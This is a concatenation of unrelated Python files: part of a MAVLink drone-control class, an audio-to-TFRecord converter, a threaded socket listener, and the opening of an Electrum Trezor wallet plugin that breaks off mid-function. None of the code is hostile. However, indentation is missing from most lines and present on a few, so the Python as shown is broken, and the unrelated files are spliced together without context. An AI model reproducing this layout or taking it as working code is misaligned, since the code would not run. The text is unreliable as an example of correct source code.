self._servo3_raw = msg.servo3_raw
self._servo4_raw = msg.servo4_raw
self._servo5_raw = msg.servo5_raw
self._servo6_raw = msg.servo6_raw
self._servo7_raw = msg.servo7_raw
self._servo8_raw = msg.servo8_raw
def __read_gps_raw_int(self,msg):
self._eph = msg.eph
self._epv = msg.epv
self._satellites_visible = msg.satellites_visible
self._fix_type = msg.fix_type
def __read_ekf_status_report(self,msg):
ekf_flags = msg.flags
# boolean: EKF's horizontal position (absolute) estimate is good
self._ekf_poshorizabs = (ekf_flags & ardupilotmega.EKF_POS_HORIZ_ABS) > 0
        # boolean: EKF is in constant position mode and does not know its absolute or relative position
self._ekf_constposmode = (ekf_flags & ardupilotmega.EKF_CONST_POS_MODE) > 0
# boolean: EKF's predicted horizontal position (absolute) estimate is good
self._ekf_predposhorizabs = (ekf_flags & ardupilotmega.EKF_PRED_POS_HORIZ_ABS) > 0
def __read_local_position_ned(self,msg):
        # in MAVLink LOCAL_POSITION_NED, x is north, y is east and z is down
        self._north = msg.x
        self._east = msg.y
self._down = msg.z
def __read_heartbeat(self,msg):
if self.master.probably_vehicle_heartbeat(msg):
self._flightmode = mavutil.mode_mapping_acm[msg.custom_mode]
self._armed = (msg.base_mode & mavutil.mavlink.MAV_MODE_FLAG_SAFETY_ARMED) != 0
self._system_status = msg.system_status
self._autopilot_type = msg.autopilot
self._vehicle_type = msg.type # quadcopter, plane, etc.
def __read_attitude(self,msg):
self._roll = msg.roll
self._pitch = msg.pitch
self._yaw = msg.yaw
self._rollspeed = msg.rollspeed
self._pitchspeed = msg.pitchspeed
self._yawspeed = msg.yawspeed
def __read_mission_count(self,msg):
self._msg_mission_count = msg
def __read_mission_item(self,msg):
self._msg_mission_item = msg
def __read_mission_request(self,msg):
if self._wp_uploaded is not None:
wp = self._wp.wp(msg.seq)
self.master.mav.send(wp)
self._wp_uploaded[msg.seq] = True
def __read_command_ack(self,msg):
self._msg_command_ack = msg
class Drone(MavlinkMessage):
def __init__(self,port):
#start connection on the given port
self.master = mavutil.mavlink_connection(port)
# store waypoints from the command
self._waypoints = {}
self._home = None
        # wait_heartbeat must be called before MavlinkMessage is initialized.
        # Once MavlinkMessage starts its reader thread it consumes every incoming
        # MAVLink message, so methods of this class should not call recv_match()
        # themselves; instead, handle additional message types by registering them
        # in the MavlinkMessage message table.
self.master.wait_heartbeat()
#set home location when initializing
msg = self.master.recv_match(type = 'GLOBAL_POSITION_INT',blocking = True)
self._home = Location(msg.lat*1e-7,msg.lon*1e-7,msg.alt*1e-3,msg.relative_alt*1e-3)
print("Home location set to lat = ", self._home.lat," lon = ",self._home.lon, "alt = ",self._home.alt)
#read current mission
self.mission_read()
MavlinkMessage.__init__(self,self.master)
def set_flight_mode(self,mode):
"""Set drone flight mode
Args:
mode (string): flight mode name such as 'GUIDED','LOITER','RTL'
"""
mavutil.mavfile.set_mode(self.master,mode,0,0)
def arm(self):
"""Drone arm
"""
self.master.mav.command_long_send(self.master.target_system,
self.master.target_component,
mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
0,
1, 0, 0, 0, 0, 0, 0)
def disarm(self):
"""Drone disarm
"""
self.master.mav.command_long_send(self.master.target_system,
self.master.target_component,
mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
0,
0, 0, 0, 0, 0, 0, 0)
def arm_and_takeoff(self,altitude,auto_mode = True):
"""Drone arm and takeoff
Args:
altitude (integer): altitude in meters(m)
auto_mode (bool, optional): continue auto mission after takeoff. Defaults to True.
"""
        # poll until the autopilot reports it is safe to arm (avoid a busy loop)
        while not self.is_armable:
            time.sleep(0.5)
self.set_flight_mode('GUIDED')
self.arm()
self.master.mav.command_long_send(0, 0,
mavutil.mavlink.MAV_CMD_NAV_TAKEOFF
,0, 0, 0, 0, 0, 0, 0, altitude)
if(auto_mode):
self.set_flight_mode('AUTO')
def simple_goto(self,location):
"""Drone goto a waypoint
Args:
location (Location): Location class with lat,lon and alt
"""
self.master.mav.mission_item_send(0, 0, 0, mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT,
mavutil.mavlink.MAV_CMD_NAV_WAYPOINT, 2, 0, 0,
0, 0, 0, location.lat, location.lon,
location.alt)
def set_home(self,home_location=None):
"""Drone set home
Args:
home_location (Location, optional): If location given, sets that location as home. If not given sets boot position as home. Defaults to None.
"""
        if home_location is None:
home_location = self._home
self.master.mav.command_long_send(
self.master.target_system, self.master.target_component,
mavutil.mavlink.MAV_CMD_DO_SET_HOME,
1, # set position
0, # param1
0, # param2
0, # param3
0, # param4
home_location.lat, # lat
home_location.lon, # lon
home_location.alt) # alt
def mission_read(self, file_name = 'mission/mission_read.txt'):
"""Drone current mission read
Args:
            file_name (str, optional): File name to store the mission into. Defaults to 'mission/mission_read.txt'.
"""
#ask for mission count
self.master.waypoint_request_list_send()
#wait for receive mavlink msg type MISSION_COUNT
msg = self.master.recv_match(type = ['MISSION_COUNT'],blocking = True)
waypoint_count = msg.count
print("msg.count:",waypoint_count)
output = 'QGC WPL 110\n'
mission_count = 0
for i in range(waypoint_count):
#ask for individual waypoint
self.master.waypoint_request_send(i)
#wait for receive mavlink msg type MISSION_ITEM
msg = self.master.recv_match(type = ['MISSION_ITEM'],blocking = True)
#commandline is used to store msg in a given format
commandline="%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (msg.seq,msg.current,msg.frame,msg.command,msg.param1,msg.param2,msg.param3,msg.param4,msg.x,msg.y,msg.z,msg.autocontinue)
output += commandline
#store the waypoints in waypoint dictionary
if (msg.command != 22):
if(msg.seq != 0): #i.e not home location
self._waypoints[mission_count] = {
'lat':msg.x,
'lng':msg.y,
'alt':msg.z,
'command':msg.command
}
else: #i.e home location
self._home.lat = msg.x
self._home.lon = msg.y
self._waypoints[mission_count] = {
'lat':self._home.lat,
'lng':self._home.lon
}
mission_count += 1
#write to file
with open(file_name,'w') as file_:
print("Write mission to file")
file_.write(output)
def mission_upload(self, file_name = 'mission/mission.txt'):
"""Drone mission upload from available mission text file
Args:
            file_name (str, optional): File name to upload the mission from. Defaults to 'mission/mission.txt'.
Raises:
Exception: Mission file type not supported
"""
#clear waypoints before uploading, so that new waypoints can be added
self._waypoints.clear()
mission_count = 0
with open(file_name) as f:
for i, line in enumerate(f):
if i == 0:
if not line.startswith('QGC WPL 110'):
raise Exception('File is not supported WP version')
else:
linearray=line.split('\t')
ln_seq = int(linearray[0])
ln_current = int(linearray[1])
ln_frame = int(linearray[2])
ln_command = int(linearray[3])
ln_param1=float(linearray[4])
ln_param2=float(linearray[5])
ln_param3=float(linearray[6])
ln_param4=float(linearray[7])
ln_x=float(linearray[8])
ln_y=float(linearray[9])
ln_z=float(linearray[10])
ln_autocontinue = int(float(linearray[11].strip()))
#store in waypoints
if(ln_command != 22):
if(ln_seq != 0): #i.e not home location
self._waypoints[mission_count] = {
'lat':ln_x,
'lng':ln_y,
'alt':ln_z,
'command':ln_command
}
else:
self._waypoints[mission_count] = {
'lat':ln_x,
'lng':ln_y
}
mission_count += 1
p = mavutil.mavlink.MAVLink_mission_item_message(0, 0, ln_seq, ln_frame,
ln_command,
ln_current, ln_autocontinue, ln_param1, ln_param2, ln_param3, ln_param4, ln_x, ln_y, ln_z)
self._wp.add(p)
#while uploading mission, first home should be given
self.set_home()
#msg = self.master.recv_match(type = ['COMMAND_ACK'],blocking = True)
#print(msg)
print('Set home location: {0} {1}'.format(self._home.lat,self._home.lon))
time.sleep(1)
#send waypoint to airframe
self.master.waypoint_clear_all_send()
if self._wp.count() > 0:
self._wp_uploaded = [False] * self._wp.count()
self.master.waypoint_count_send(self._wp.count())
while False in self._wp_uploaded:
time.sleep(0.1)
self._wp_uploaded = None
        # From this point on, waypoint sending is handled inside the MavlinkMessage class whenever a MISSION_REQUEST arrives
@property
def flight_plan(self):
"""Drone waypoints in which it will fly
Returns:
[dict]: a dictionary with all the waypoint that drone will fly
"""
return self._waypoints
@property
def is_armable(self):
"""Drone condition that whether it is safe to arm or not
Returns:
bool: safe to arm if True , not safe to arm if False
"""
# check that we have a GPS fix
# check that EKF pre-arm is complete
return (self._fix_type > 1) and self._ekf_predposhorizabs
@property
def ekf_ok(self):
"""Drone EKF Status
Returns:
bool: EKF ok if True, EKF not ok if False
"""
# use same check that ArduCopter::system.pde::position_ok() is using
if self._armed:
return self._ekf_poshorizabs and not self._ekf_constposmode
else:
return self._ekf_poshorizabs or self._ekf_predposhorizabs
@property
def system_status(self):
"""Drone system status
Returns:
string: The current status of drone. 'BOOT' means drone is booting, 'STANDBY' means drone is in standby mode.
"""
return {
0: 'UNINIT',
1: 'BOOT',
2: 'CALIBRATING',
3: 'STANDBY',
4: 'ACTIVE',
5: 'CRITICAL',
6: 'EMERGENCY',
7: 'POWEROFF',
8 : 'FLIGHT_TERMINATION'
}.get(self._system_status, None)
@property
def is_armed(self):
"""Arming status of the drone
Returns:
bool: True if armed, False if disarmed
"""
return self._armed
@property
def flight_mode(self):
"""Flight mode status of the drone
Returns:
string: 'GUIDED' if in guided mode, 'RTL' if in rtl mode and so on
"""
return self._flightmode
@property
def heading(self):
"""Heading of the drone
Returns:
integer: True heading of the drone
"""
return self._heading
@property
def groundspeed(self):
"""Ground speed of the drone
Returns:
float: Ground speed of the drone (m/s)
"""
return self._groundspeed
@property
def airspeed(self):
"""Airspeed of the drone
Returns:
float: Air speed of the drone (m/s)
"""
return self._airspeed
@property
def velocity(self):
"""Velocity of the drone in x,y,z frame
Returns:
            Velocity: Velocity.vx = velocity in N direction, Velocity.vy = velocity in E direction, Velocity.vz = velocity in D direction (positive down)
"""
return Velocity(self._vx, self._vy, self._vz)
@property
def battery(self):
"""Battery status of the drone
Returns:
Battery: Battery.voltage = voltage, Battery.current = current , Battery.level = charge percentage
"""
return Battery(self._voltage,self._current,self._level)
@property
def attitude(self):
"""Attitude status of the drone
Returns:
Attitude: Attitude.roll = roll, Attitude.pitch = pitch, Attitude.yaw = yaw of the drone
"""
return Attitude(self._roll,self._pitch,self._yaw,self._rollspeed,self._pitchspeed,self._yawspeed)
@property
def location(self):
"""Current Location of the drone
Returns:
Location: Location.lat = latitude
Location.lon = longitude
Location.alt = altitude
Location.altR = relative altitude
                Location.north = north in NED frame
                Location.east = east in NED frame
                Location.down = down in NED frame
"""
return Location(self._lat,self._lon,self._alt,self._relative_alt,self._north,self._east,self._down)
@property
def gps_0(self):
"""GPS status of the drone
Returns:
GPSInfo: GPSInfo.eph = eph of drone, GPSInfo.epv = epv of drone, GPSInfo.fix_type = fix type, GPSInfo.satellites_visible = number of satellites visible
"""
return(GPSInfo(self._eph,self._epv,self._fix_type,self._satellites_visible))
## Classes for drone conditions defined below
class Battery():
def __init__(self, voltage, current, level):
self.voltage = voltage / 1000.0
if current == -1:
self.current = None
else:
self.current = current #/ 100.0
if level == -1:
self.level = None
else:
self.level = level
def __str__(self):
return "Battery:voltage={},current={},level={}".format(self.voltage, self.current,
self.level)
class Location():
def __init__(self,lat=None,lon=None,alt=None,altR=None,north=None,east=None,down=None):
self.lat = lat
self.lon = lon
self.alt = alt
self.altR = altR
self.north = north
self.east = east
self.down = down
def __str__(self):
return "LocationGlobal:lat=%s,lon=%s,altR=%s,alt=%s || LocationLocal:north=%s,east=%s,down=%s" % (self.lat, self.lon, self.altR,self.alt,self.north, self.east, self.down)
class GPSInfo():
def __init__(self, eph, epv, fix_type, satellites_visible):
self.eph = eph
self.epv = epv
self.fix_type = fix_type
self.satellites_visible = satellites_visible
def __str__(self):
return "GPSInfo:fix=%s,num_sat=%s" % (self.fix_type, self.satellites_visible)
class Attitude():
def __init__(self, roll, pitch, yaw,rollspeed,pitchspeed,yawspeed):
self.pitch = pitch
self.yaw = yaw
self.roll = roll
self.rollspeed = rollspeed
self.pitchspeed = pitchspeed
self.yawspeed = yawspeed
def __str__(self):
return "Attitude:roll=%s,pitch=%s,yaw=%s" % (self.roll, self.pitch,self.yaw)
class Velocity():
def __init__(self,vx,vy,vz):
self.vx = vx
self.vy = vy
self.vz = vz
def __str__(self):
return "Velocity:vx=%s,vy=%s,vz=%s" % (self.vx, self.vy,self.vz)
|
wav2tfrd.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import os
from multiprocessing import Manager, Pool  # the queues are shared by multiple processes, so they must come from a Manager
from threading import Thread
from concurrent.futures import ThreadPoolExecutor
from glovar import get_annotations
from glovar import cqt_dual, params
from glovar import MODES, FLAGS
from glovar import _int_feature, _float_feature
from functools import partial
import time
import random
random.seed(1)
def open_tfrecord_writer(network, mode, parallel_num):
tfrd_dir = os.path.join(FLAGS.save_dir, mode, network)
if not os.path.exists(tfrd_dir):
os.makedirs(tfrd_dir)
writers=[tf.python_io.TFRecordWriter(os.path.join(tfrd_dir, '%04d.tfrecords'%i)) for i in range(parallel_num)]
return writers
def close_tfrecord_writer(writers):
for writer in writers:
writer.close()
def frame_labels(label_path):
sr = params.sr
hop_len = params.hop_len
annotation = np.loadtxt(label_path)[:, [0, 2]]
frame_len = int(annotation[-1, 0]*sr/hop_len)
pitch_labels = np.zeros([frame_len, 88], dtype=np.uint8)
annotation = annotation[annotation[:,0]<=frame_len*hop_len/sr]
for onset, pitch in annotation:
pitch_labels[int(onset*sr/hop_len), int(pitch-21)] = 1
onset_labels = pitch_labels.any(axis=-1, keepdims=True).astype(np.uint8)
weighted_onset_labels = np.zeros_like(onset_labels)
frame_len = onset_labels.shape[0]
for i in range(frame_len):
if onset_labels[i] == 1:
weighted_onset_labels[i] = 3
elif onset_labels[max(i-1, 0):min(i+2, frame_len)].any():
weighted_onset_labels[i] = 2
elif onset_labels[max(i-2, 0):min(i+3, frame_len)].any():
weighted_onset_labels[i] = 1
return weighted_onset_labels, pitch_labels
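# Worked example of the onset weighting above (illustrative): if a single onset
# falls in frame 5, the surrounding weighted_onset_labels are
#   frame:  2  3  4  5  6  7  8
#   weight: 0  1  2  3  2  1  0
# i.e. exact onset frames get weight 3, frames one step away get 2 and frames
# two steps away get 1, giving nearby frames partial credit.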
def get_train_examples(mode, specs, onset_labels, pitch_labels):
spec_len, num_data, depth = specs.shape
num_data = min(num_data, onset_labels.shape[0])
offset = params.win_len//2
specs = np.pad(specs, ((0, 0), (offset, offset), (0,0)), 'constant')
onset_labels = np.pad(onset_labels, ((offset, offset), (0, 0)), 'constant')
pitch_labels = np.pad(pitch_labels, ((offset, offset), (0, 0)), 'constant')
split_specs = np.zeros([num_data, spec_len, params.win_len, depth], dtype=np.float32)
split_onset_labels = np.zeros([num_data, 1], dtype=np.uint8)
split_pitch_labels = np.zeros([num_data, 88], dtype=np.uint8)
for i in range(offset, offset+num_data):
split_specs[i-offset] = specs[:, i-offset:i+offset+1]
split_onset_labels[i-offset] = onset_labels[i]
split_pitch_labels[i-offset] = pitch_labels[i]
pos_idxs = list(np.where(np.reshape(split_onset_labels, [-1]) == 3)[0])
neg_idxs = list(np.where(np.reshape(split_onset_labels, [-1]) < 3)[0])
sample_neg_idxs = random.sample(neg_idxs,len(neg_idxs)//10) if mode == tf.estimator.ModeKeys.TRAIN else neg_idxs
onset_idxs = pos_idxs + sample_neg_idxs
pitch_idxs = pos_idxs
random.shuffle(onset_idxs)
random.shuffle(pitch_idxs)
onset_specs, onset_labels = split_specs[onset_idxs], split_onset_labels[onset_idxs]
pitch_specs, pitch_labels = split_specs[pitch_idxs], split_pitch_labels[pitch_idxs]
return (onset_specs, onset_labels), (pitch_specs, pitch_labels)
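# Note (added for clarity): every training example produced above is a
# spectrogram patch of shape (spec_len, win_len, depth) centred on one frame.
# Frames carrying a hard onset (weight 3) are always kept; in TRAIN mode only
# about 10% of the remaining frames are sampled as negatives, while EVAL keeps
# them all.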
def producer(q1, q2, mode, annotation):
print('\n', annotation[0])
wav_path, label_path = annotation
specs = cqt_dual(wav_path)
onset_labels, pitch_labels = frame_labels(label_path)
(onset_specs, onset_labels), (pitch_specs, pitch_labels) = get_train_examples(mode, specs, onset_labels, pitch_labels)
to_example = lambda spec, label: tf.train.Example(
features=tf.train.Features(
feature={
'spec': _float_feature(spec),
'label': _int_feature(label),
}
)
)
def writer_to_queue(specs, labels, q):
for spec, label in zip(specs, labels):
example = to_example(spec, label).SerializeToString()
q.put(example)
t1 = Thread(target = writer_to_queue, args = (onset_specs, onset_labels, q1))
t2 = Thread(target = writer_to_queue, args = (pitch_specs, pitch_labels, q2))
t1.start()
t2.start()
t1.join()
t2.join()
print('\n', 'processing', os.getpid(), 'is leaving')
def consumer(q1, q2, w):
def writer_tfrd(q, w):
time.sleep(240)
while True:
try:
example = q.get(timeout=300)
except Exception as e:
break
w.write(example)
time.sleep(0.01)
w1, w2 = w
t1 = Thread(target=writer_tfrd, args=(q1, w1))
t2 = Thread(target=writer_tfrd, args=(q2, w2))
t1.start()
t2.start()
t1.join()
t2.join()
print('\n', 'consumer', os.getpid(), 'is leaving')
def convert_to_tfrecord(mode, anno):
    assert mode in MODES, "invalid mode"
onset_writers = open_tfrecord_writer('onset', mode, 64)
pitch_writers = open_tfrecord_writer('pitch', mode, 64)
writers = list(zip(onset_writers, pitch_writers))
manager = Manager()
q1 = manager.Queue()
q2 = manager.Queue()
p1 = Pool(FLAGS.parallel_num)
p2 = ThreadPoolExecutor(64)
p1_func = partial(producer, q1, q2, mode)
p2_func = partial(consumer, q1, q2)
p1.map_async(p1_func, anno)
p2.map(p2_func, writers)
p1.close()
p1.join()
print('\nfinish process pool')
p2.shutdown()
print('\nfinish threading pool')
close_tfrecord_writer(onset_writers)
close_tfrecord_writer(pitch_writers)
print('\nreturn to main thread')
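# Design note (added for clarity): convert_to_tfrecord wires a Pool of producer
# processes to a ThreadPoolExecutor of consumer threads through two Manager
# queues. Each producer decodes one (wav, label) pair into serialized
# tf.train.Example protos, pushing onset examples onto q1 and pitch examples
# onto q2; each consumer thread owns one (onset, pitch) writer pair and drains
# the queues into its shard until a 300 s get() timeout signals the end.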
def main(_):
annotation = get_annotations(tf.estimator.ModeKeys.TRAIN)
convert_to_tfrecord(tf.estimator.ModeKeys.TRAIN, annotation)
annotation = get_annotations(tf.estimator.ModeKeys.EVAL)
convert_to_tfrecord(tf.estimator.ModeKeys.EVAL, annotation)
if __name__ == '__main__':
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
|
Listener.py
|
#!/usr/bin/env python
# The MIT License (MIT)
#
# Copyright (c) 2015 Caian Benedicto <caian@ggaunicamp.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from libspitz import ClientEndpoint
from libspitz import config
from libspitz import log_lines
import socket, threading, time, logging, os, traceback, sys
class Listener(object):
"""Threaded TCP/UDS listener with callback"""
def __init__(self, mode, address, port, callback, user_args):
self.mode = mode
self.addr = address
self.port = port
self.callback = callback
self.user_args = user_args
self.thread = None
self.socket = None
def GetConnectableAddr(self):
addr = '' #self.mode
if self.mode == config.mode_tcp:
addr += socket.gethostname() + ':' + str(self.port)
elif self.mode == config.mode_uds:
addr += socket.gethostname() + ':' + str(self.addr)
else:
logging.error('Invalid listener mode %s provided!' % (self.mode))
raise Exception()
return addr
def listener(self):
if self.mode == config.mode_tcp:
logging.info('Listening to network at %s:%d...',
self.addr, self.port)
elif self.mode == config.mode_uds:
logging.info('Listening to file at %s...',
self.addr)
while True:
try:
conn, addr = self.socket.accept()
# Assign the address from the connection
if self.mode == config.mode_tcp:
# TCP
addr, port = addr
elif self.mode == config.mode_uds:
# UDS
addr = 'uds'
port = 0
# Create the endpoint and send to a thread to
# process the request
endpoint = ClientEndpoint(addr, port, conn)
threading.Thread(target = self.callback,
args=((endpoint, addr, port) + self.user_args)).start()
except:
log_lines(sys.exc_info(), logging.debug)
log_lines(traceback.format_exc(), logging.debug)
time.sleep(10)
def Start(self):
if self.socket:
return
if self.mode == config.mode_tcp:
# Create a TCP socket
socktype = socket.AF_INET
sockaddr = (self.addr, self.port)
elif self.mode == config.mode_uds:
# Remove an old socket
try:
os.unlink(self.addr)
except:
pass
# Create an Unix Data Socket instead of a
# normal TCP socket
try:
socktype = socket.AF_UNIX
except AttributeError:
logging.error('The system does not support ' +
'Unix Domain Sockets!')
raise
sockaddr = self.addr
else:
logging.error('Invalid listener mode %s provided!' % (self.mode))
raise Exception()
        try:
            self.socket = socket.socket(socktype, socket.SOCK_STREAM)
            self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        except socket.error:
            logging.error('Failed to create listener socket!')
            raise
        try:
            self.socket.bind(sockaddr)
            self.socket.listen(1)
        except socket.error:
            logging.error('Failed to bind listener socket!')
            raise
# If any port is selected, get the
# actual port assigned by the system
if self.mode == config.mode_tcp and self.port == 0:
addr, port = self.socket.getsockname()
self.port = port
self.thread = threading.Thread(target=self.listener)
self.thread.start()
def Stop(self):
if self.socket:
self.socket.close()
self.socket = None
if self.mode == config.mode_uds:
# Remove the socket file if it is an UDS
try:
os.unlink(self.addr)
except:
pass
def Join(self):
if self.thread:
self.thread.join()
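# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module). It assumes the
# libspitz config.mode_tcp constant used above; port 0 lets the OS pick a free
# port. Run the module directly to try it, Ctrl+C to stop.
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    def on_connect(endpoint, addr, port, greeting):
        # endpoint is the ClientEndpoint wrapping the accepted connection
        logging.info('%s: connection from %s:%s', greeting, addr, port)
    listener = Listener(config.mode_tcp, '0.0.0.0', 0, on_connect, ('hello',))
    listener.Start()
    logging.info('Listening on %s', listener.GetConnectableAddr())
    listener.Join()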
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device, runs_in_hwd_thread
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException,
get_xpubs_and_der_suffixes_from_txinout)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
Capability, BackupType, RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, AmountUnit)
from trezorlib.client import PASSPHRASE_ON_DEVICE
TREZORLIB = True
except Exception as e:
if not (isinstance(e, ModuleNotFoundError) and e.name == 'trezorlib'):
_logger.exception('error importing trezor plugin deps')
TREZORLIB = False
class _EnumMissing:
def __init__(self):
self.counter = 0
self.values = {}
def __getattr__(self, key):
if key not in self.values:
self.values[key] = self.counter
self.counter += 1
return self.values[key]
Capability = _EnumMissing()
BackupType = _EnumMissing()
RecoveryDeviceType = _EnumMissing()
AmountUnit = _EnumMissing()
PASSPHRASE_ON_DEVICE = object()
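    # _EnumMissing is a stand-in for the missing trezorlib enums: the first time
    # an attribute is looked up it is assigned the next free integer (the exact
    # numbers depend on access order), so the rest of the module can keep
    # referring to e.g. Capability.* and RecoveryDeviceType.* without trezorlib.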
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
plugin: 'TrezorPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password, *, script_type=None):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
script_type = self.plugin.get_trezor_input_script_type(script_type)
msg_sig = client.sign_message(address_path, message, script_type=script_type)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None:
raise UserFacingException(_('Missing previous tx.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
backup_type: int = BackupType.Bip39
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://pypi.org/project/trezor/'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 13, 0)
maximum_library = (0, 14)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
self._is_bridge_available = None
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
@runs_in_hwd_thread
def is_bridge_available(self) -> bool:
# Testing whether the Bridge is available can take several seconds
# (when it is not), as it is slow to timeout, hence we cache it.
if self._is_bridge_available is None:
try:
call_bridge("enumerate")
except Exception:
self._is_bridge_available = False
# never again try with Bridge due to slow timeout
BridgeTransport.ENABLED = False
else:
self._is_bridge_available = True
return self._is_bridge_available
@runs_in_hwd_thread
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
if self.is_bridge_available():
devices = BridgeTransport.enumerate()
else:
devices = trezorlib.transport.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
@runs_in_hwd_thread
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['TrezorClientBase']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Particl"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.").format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RecoveryDeviceType.ScrambledWords:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
